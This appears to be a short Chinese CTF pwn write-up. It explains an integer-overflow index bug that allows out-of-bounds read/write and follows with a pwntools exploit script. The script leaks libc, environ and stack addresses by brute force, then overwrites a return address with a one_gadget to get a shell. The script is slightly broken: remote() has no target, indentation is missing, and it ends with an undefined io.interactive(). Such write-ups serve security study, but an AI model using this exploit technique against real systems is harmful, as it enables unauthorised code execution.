这里read是从无符号数组开始读入,但是不能直接read否则会报错,
我们可以利用整数溢出来进行读入,多次爆破后利用printf泄露出环境和libc基值,然后我们可以任意地址读写 读个栈地址打通
from pwn import *
context.log_level = 'debug'
context.update(terminal=['tmux','splitw','-h'])
p= remote()
while (True):
p.recvuntil('Your choice: ')
p.sendline(str(2))
p.recvuntil('Index: ')
p.sendline(str(256))
p.recvuntil('Your choice: ')
p.sendline(str(1))
p.recvuntil('Index: ')
try:
a = p.recvuntil('Result:')
except:
continue
if a == 'Result:':
p.close()
continue
else:
payload = '\xe9' + '\xff' * 7
p.sendline(payload)
read_addr = int(p.recvline()[8:], 16)
libc_base = read_addr - 0x110140
environ_addr = libc_base + 0x3ee098
payload = '\xa4' + '\xff' * 7
p.sendafter('Your choice: ', str(1))
p.sendafter('Index: ', payload)
base = int(p.recvline()[8:], 16) - 0xa00
zhi_add = base + 0x202060
payload = p64((environ_addr - zhi_add) // 8, signed=True)
p.sendlineafter('Your choice: ', str(1))
p.sendafter('Index: ', payload)
stack_addr = int(p.recvline()[8:], 16)
write_base = stack_addr - 0x120
p.sendlineafter('Your choice: ', str(2))
p.sendlineafter('Index: ', str((write_base - zhi_add) // 8))
p.send(p64(libc_base + 0x10a41c))
io.interactive()